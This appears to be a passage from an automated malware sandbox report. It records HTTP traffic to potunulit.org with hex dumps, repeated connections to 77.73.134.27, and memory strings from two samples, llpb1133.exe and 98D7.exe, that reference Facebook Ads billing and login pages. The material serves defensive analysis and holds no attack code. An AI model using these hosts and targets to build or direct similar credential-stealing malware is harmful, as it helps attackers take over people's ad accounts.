IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)|p|t]ShG*jo6S5sl=3wE|WDh<P%Q"?f=(*jC\SMUbT[U&XJ3Ob>!+:V?#BSSR+{~ExU$O~iIx^%50zN,%Qa
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Feb 2023 18:45:03 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ZhVv9Hbs0Pu35ErVgIejY8akgvHGK9Z5epV68O699U83p3C0e0Gm4gWpMz0SQFKFYjU%2FsIo3X5T1eoHH5m15EYivk%2FCa8yLlMQlRlb27%2Fp6AHfv2Igzyua8nfqqXMQHi"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 795e47c938e690d6-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Feb 2023 18:45:03 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=XFK0QKkaa4pr36dTOcr1JvoLNkyph%2F8OC1pg6%2BqgaCfB%2B0jrtaV6xW2LoyPBDImuhA3oJ7pBjTCTWNJlQVpZx%2BjEc%2BSjaHtQviIUp7I6rxwKhVTncFPs0157is082Oyk"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 795e47c9b98590d6-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Feb 2023 18:45:05 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OZ%2FjPrkqtcdSScC3gxiCqGcm2tLdo3QsuXe%2F339%2F2pwMU5tF1ETm1xJHfqtWOv%2FfOLpTc6pHJDADwehjyvj3ScvI4G58UhwwUhm8Gzeb6rFywVLsdIxilctHDBZYsvsJ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 795e47d54d30368c-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Feb 2023 18:45:05 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JxQQdeSH%2FRqLKZl0%2Famu5hbadwIAtq3ohh8zWVCHwWCrVav84QHXDxiKQu3lGP5gTm3TuQQikvq%2FJDOoozcHsk9Fm9MgDlTINQFMr%2B4bpneX9XsfV0Bxas5kX%2FhLXVsC"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 795e47d65eed368c-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 33 37 61 66 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 ed 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 60 55 61 3a 79 ca 77 53 d5 9a 8c 9f 09 09 50 5c 31 86 f0 7d e1 37 bd 55 01 2f 79 de 2e f9 56 9c 30 f4 95 ea fe d1 32 eb 55 e0 a0 93 a8 fb 34 51 f7 ec dd d0 60 a8 58 87 cb 1b 8b 72 05 70 be ec f0 c0 a2 09 33 38 28 fa 85 0d a0 f4 03 9b 7c 7f bf 6c 13 d9 e8 ec 3d e5 33 4f 62 3e 15 21 0b 5a a3 06 93 3a 56 3f cb 00 23 be 42 15 d7 07 53 53 aa 8e 1f 9e 51 08 56 2b 7c 9a fd 19 7e 45 f7 ff 78 8d 55 db 24 0d 11 12 b4 1f e8 92 24 82 4e c5 03 9f df a1 61 7e de f5 96 ce 19 17 7e 4f af 9a a5 e4 c8 a0 c1 b9 9d 7a 0d 80 4e 19 e0 2e 95 a9 1d 1a f5 96 be 25 51 61 9f d4 3e 7c 88 28 c8 48 6b 51 d5 4a 9a 07 fd ec f1 27 78 ac 85 2f bd e0 0d c0 4d bf 46 24 fd f8 12 6c 23 6c 29 6c 0a 8d c7 fd e4 0e b4 eb 7e 71 eb 80 f5 1a 68 9b 4a d8 e5 22 cd 4f 6b 79 82 ae 9c 37 17 4c 9d 48 ad f3 57 3b 2a b9 72 ee cc 23 b2 75 0e 31 79 92 90 f7 df 35 f9 e7 32 24 4c 80 90 00 f9 13 7f 11 bb d6 af 31 3c 27 d4 69 b7 9f 33 c9 cc 46 d9 48 15 ac af eb d9 55 3d af ba 68 52 30 ff 9d 3f 7f 55 40 57 64 7b 39 66 e7 ac 04 28 94 42 40 9b 9a c7 9b 84 e7 3d 66 f1 8a 64 b1 1d 30 12 51 8c 70 17 4b 81 6b df 8e 82 01 e8 e4 31 2a c4 e8 3a a1 54 55 db 06 b6 1b 6f d3 cb 29 32 a2 e6 5b 1e 50 ab 1e 26 7d 11 ee c3 ce 57 a3 4c 1d 85 1f f4 5c 68 f1 b2 4d 67 85 4d 5e ae 03 4b 11 0c e4 a6 dd 11 9f 10 81 d8 b0 99 89 98 8a cd e4 7f 74 79 50 6d 43 cc b9 8b 8b a1 62 7a 17 b2 fa b0 92 48 a9 b4 bb e9 64 17 28 d2 0e 53 1f d0 81 aa 7a 8f 30 69 e3 cd d0 d9 37 00 80 e3 1c c9 20 f5 52 08 c4 3a d6 63 b9 82 7b 50 bf e5 7e d9 81 70 d4 03 2b b9 98 76 46 0f ca 82 29 27 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 1f 29 43 01 9c 55 03 62 18 3a 1d f8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 c3 e8 Data Ascii: 37af`@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)|p|t]ShG*`Ua:ywSP\1}7U/y.V02U4Q`Xrp38(|l=3Ob>!Z:V?#BSSQV+|~ExU$$Na~~OzN.%Qa>|(HkQJ
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Feb 2023 18:45:06 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=sPDhrOjLZofCj5OxhMz6NIXYXAfNgVprp0TU6xLbsmLe9TF0XcXJ7eUfRR4gSq%2FQnENu3rFAu6ALYnAyezy%2FPgdrPY%2FUIezKuwsrV5haZZCsH73rkE9cUnt5IQO%2Bires"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 795e47d90b20368c-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Feb 2023 18:45:06 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=aWGUvC9p7B9ge2VmPEDbD1T2gZA3FnRQeyST42aQmwHMVbkvBU%2BinrYVfPZcF6Ot3cWgx2RtufcPO824ddUMUCbODlWkOHKN%2FXp34UqxUUVD6GPOPfpQOj%2BE6VQ6Zb8q"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 795e47da7d86368c-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 37 64 37 39 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 ed 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 60 55 61 3a 79 ca 77 53 d5 9a 8c 9f 09 09 50 5c 31 86 f0 7d e1 37 bd 55 01 2f 79 de 2e f9 56 9c 30 f4 95 ea fe d1 32 eb 55 e0 a0 93 a8 fb 34 51 f7 ec dd d0 60 a8 58 87 cb 1b 8b 72 05 70 be ec f0 c0 a2 09 33 38 28 fa 85 0d a0 f4 03 9b 7c 7f bf 6c 13 d9 e8 ec 3d e5 33 4f 62 3e 15 21 0b 5a a3 06 93 3a 56 3f cb 00 23 be 42 15 d7 07 53 53 aa 8e 1f 9e 51 08 56 2b 78 39 84 19 7e 45 f7 ff 78 8d 55 db 24 0d 11 12 b4 1f e8 92 24 82 4e c5 03 9f df a1 61 7e de f5 96 ce 19 17 7e 4f af 9a a5 e4 c8 a0 c1 b9 9d 7a 0d 80 4e 19 e0 2e 95 a9 1d 1a f5 96 be 25 51 61 9f d4 3e 7c 88 28 c8 48 6b 51 d5 4a 9a 07 fd ec 1d 4d 78 ac 85 2f bd e0 0d c0 4d bf 46 24 fd f8 12 6c 23 6c 29 6c 0a 8d c7 fd e4 0e b4 eb 7e 71 eb 80 f5 1a 68 9b 4a d8 e5 22 cd 4f 6b 79 82 ae 9c 37 17 4c 9d 48 ad f3 57 3b 2a b9 72 ee cc 23 b2 75 0e 31 79 92 90 f7 df 35 f9 e7 46 24 4c 80 90 00 f9 13 7f 11 bb d6 af 31 3c 27 d4 69 b7 9f 33 c9 cc 46 d9 48 15 ac af eb d9 55 3d af ba 68 52 30 ff 9d 3f 7f 55 40 57 64 7b 39 66 e7 ac 04 28 94 42 40 9b 9a c7 9b 84 e7 3d 66 f1 8a 64 b1 1d 30 12 51 8c 70 17 4b 81 6b df 8e 82 01 e8 e4 31 2a c4 e8 3a a1 54 55 db 06 b6 1b 6f d3 cb 29 32 a2 e6 5b 1e 50 ab 1e 26 7d 11 ee c3 ce 57 a3 4c 1d 85 1f f4 5c 68 f1 b2 4d 67 85 4d 5e ae 03 eb 10 0c e4 a6 dd 11 9f 10 81 d8 b0 99 89 98 8a cd e4 7f 74 79 50 6d 43 cc b9 8b 8b a1 62 7a 17 b2 fa b0 92 48 a9 b4 bb e9 64 17 28 d2 0e 53 1f d0 81 aa 7a 8f 30 69 e3 cd d0 d9 37 00 80 e3 1c c9 20 f5 52 08 c4 3a d6 63 b9 82 7b 50 bf e5 7e df 81 70 d4 03 2b b9 98 76 46 0f ca 82 29 27 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 1f 29 43 01 9c 55 03 62 18 3a 1d f8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 c3 e8 c8 2f cb e2 Data Ascii: 7d79`@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)|p|t]ShG*`Ua:ywSP\1}7U/y.V02U4Q`Xrp38(|l=3Ob>!Z:V?#BSSQV+x9~ExU$$Na~~OzN.%Qa>|(H
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Feb 2023 18:45:06 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=nm%2B9wXOwJygUApSyo%2FsXU83kSZdAgyRAu2MkrRUoT5YQvFgA6JudWXpw4PtikPgdsZtJvoIAL%2B85C87kuvaeZZSnFfJsEkee%2BuWQ1B%2FqGnSA6JS6apLWz0%2FQnEBwX5OL"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 795e47dd29ff368c-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
          Source: unknownTCP traffic detected without corresponding DNS query: 77.73.134.27
          Source: unknownTCP traffic detected without corresponding DNS query: 77.73.134.27
          Source: unknownTCP traffic detected without corresponding DNS query: 77.73.134.27
          Source: unknownTCP traffic detected without corresponding DNS query: 77.73.134.27
          Source: unknownTCP traffic detected without corresponding DNS query: 77.73.134.27
          Source: unknownTCP traffic detected without corresponding DNS query: 77.73.134.27
          Source: unknownTCP traffic detected without corresponding DNS query: 77.73.134.27
          Source: unknownTCP traffic detected without corresponding DNS query: 77.73.134.27
          Source: unknownTCP traffic detected without corresponding DNS query: 77.73.134.27
          Source: unknownTCP traffic detected without corresponding DNS query: 77.73.134.27
          Source: unknownTCP traffic detected without corresponding DNS query: 77.73.134.27
          Source: unknownTCP traffic detected without corresponding DNS query: 77.73.134.27
          Source: unknownTCP traffic detected without corresponding DNS query: 77.73.134.27
          Source: unknownTCP traffic detected without corresponding DNS query: 77.73.134.27
          Source: unknownTCP traffic detected without corresponding DNS query: 77.73.134.27
          Source: unknownTCP traffic detected without corresponding DNS query: 77.73.134.27
          Source: unknownTCP traffic detected without corresponding DNS query: 77.73.134.27
          Source: unknownTCP traffic detected without corresponding DNS query: 77.73.134.27
          Source: unknownTCP traffic detected without corresponding DNS query: 77.73.134.27
          Source: unknownTCP traffic detected without corresponding DNS query: 77.73.134.27
          Source: unknownTCP traffic detected without corresponding DNS query: 77.73.134.27
          Source: unknownTCP traffic detected without corresponding DNS query: 77.73.134.27
          Source: unknownTCP traffic detected without corresponding DNS query: 77.73.134.27
          Source: unknownTCP traffic detected without corresponding DNS query: 77.73.134.27
          Source: unknownTCP traffic detected without corresponding DNS query: 77.73.134.27
          Source: unknownTCP traffic detected without corresponding DNS query: 77.73.134.27
          Source: unknownTCP traffic detected without corresponding DNS query: 77.73.134.27
          Source: unknownTCP traffic detected without corresponding DNS query: 77.73.134.27
          Source: unknownTCP traffic detected without corresponding DNS query: 77.73.134.27
          Source: unknownTCP traffic detected without corresponding DNS query: 77.73.134.27
          Source: unknownTCP traffic detected without corresponding DNS query: 77.73.134.27
          Source: unknownTCP traffic detected without corresponding DNS query: 77.73.134.27
          Source: unknownTCP traffic detected without corresponding DNS query: 77.73.134.27
          Source: unknownTCP traffic detected without corresponding DNS query: 77.73.134.27
          Source: unknownTCP traffic detected without corresponding DNS query: 77.73.134.27
          Source: unknownTCP traffic detected without corresponding DNS query: 77.73.134.27
          Source: unknownTCP traffic detected without corresponding DNS query: 77.73.134.27
          Source: unknownTCP traffic detected without corresponding DNS query: 77.73.134.27
          Source: unknownTCP traffic detected without corresponding DNS query: 77.73.134.27
          Source: unknownTCP traffic detected without corresponding DNS query: 77.73.134.27
          Source: unknownTCP traffic detected without corresponding DNS query: 77.73.134.27
          Source: unknownTCP traffic detected without corresponding DNS query: 77.73.134.27
          Source: unknownTCP traffic detected without corresponding DNS query: 77.73.134.27
          Source: unknownTCP traffic detected without corresponding DNS query: 77.73.134.27
          Source: unknownTCP traffic detected without corresponding DNS query: 77.73.134.27
          Source: unknownTCP traffic detected without corresponding DNS query: 77.73.134.27
          Source: unknownTCP traffic detected without corresponding DNS query: 77.73.134.27
          Source: unknownTCP traffic detected without corresponding DNS query: 77.73.134.27
          Source: unknownTCP traffic detected without corresponding DNS query: 77.73.134.27
          Source: unknownTCP traffic detected without corresponding DNS query: 77.73.134.27
          Source: llpb1133.exe, 00000014.00000002.602167234.0000000000504000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1 equals www.facebook.com (Facebook)
          Source: 98D7.exe, 00000010.00000003.485181523.00000000028B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: </span><a href="/r.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;locale=en_US&amp;display=page" rel="nofollow" class="_97w5">Sign up for Facebook</a></div></div><input type="hidden" autocomplete="off" id="prefill_contact_point" name="prefill_contact_point" value="" /><input type="hidden" autocomplete="off" id="prefill_source" name="prefill_source" /><input type="hidden" autocomplete="off" id="prefill_type" name="prefill_type" /><input type="hidden" autocomplete="off" id="first_prefill_source" name="first_prefill_source" /><input type="hidden" autocomplete="off" id="first_prefill_type" name="first_prefill_type" /><input type="hidden" autocomplete="off" id="had_cp_prefilled" name="had_cp_prefilled" value="false" /><input type="hidden" autocomplete="off" id="had_password_prefilled" name="had_password_prefilled" value="false" /><input type="hidden" autocomplete="off" name="ab_test_data" value="" /></form><script nonce="tcnyEH4i">window.ge||(window.ge=function(a){return document.getElementById(a)});window.onload=function(a){return function(){var b=ge("email"),c=ge("pass");try{b&&!b.value?b.focus():c&&c.focus()}catch(a){if(!(a.number==-2146826178))throw a}return a&&a.call(window)}}(window.onload);function pop(a){window.open(a)}function reload_on_new_cookie(a){function b(a){a=new RegExp(a+"=(.*?)(;|$)");return a.test(document.cookie)?RegExp.$1:null}b("c_user")&&!window.__cancelCookieReload&&(window.clearInterval(window.__cookieReload),window.location=a)}function begin_polling_login_cookies(a){window.__cookieReload=window.setInterval(function(){reload_on_new_cookie(a)},5e3),window.__cancelCookieReload=!1,window.addEventListener("beforeunload",function(){window.__cancelCookieReload=!0})}</script></div></div></div></div><div class=""><div class="_95ke _8opy"><div id="pageFooter" data-referrer="page_footer" data-testid="page_footer"><ul class="uiList localeSelectorList _2pid _509- _4ki _6-h _6-j _6-i" data-nocookies="1"><li>English (US)</li><li><a class="_sv4" dir="ltr" href="https://de-de.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;de_DE&quot;, &quot;en_US&quot;, &quot;https:\/\/de-de.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 0); return false;" title="German">Deutsch</a></li><li><a class="_sv4" dir="ltr" href="https://fr-fr.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;fr_FR&quot;, &quot;en_US&quot;, &quot;https:\/\/fr-fr.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 1);
          Source: llpb1133.exe, 00000014.00000002.602167234.0000000000489000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: cIwww.facebook.comHTEP equals www.facebook.com (Facebook)
          Source: 98D7.exe, 00000010.00000003.484805156.0000000000502000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billingrk\Cookiescheme1 equals www.facebook.com (Facebook)
          Source: 98D7.exe, 00000010.00000003.461533941.000000000052C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billingue122samesite22l equals www.facebook.com (Facebook)
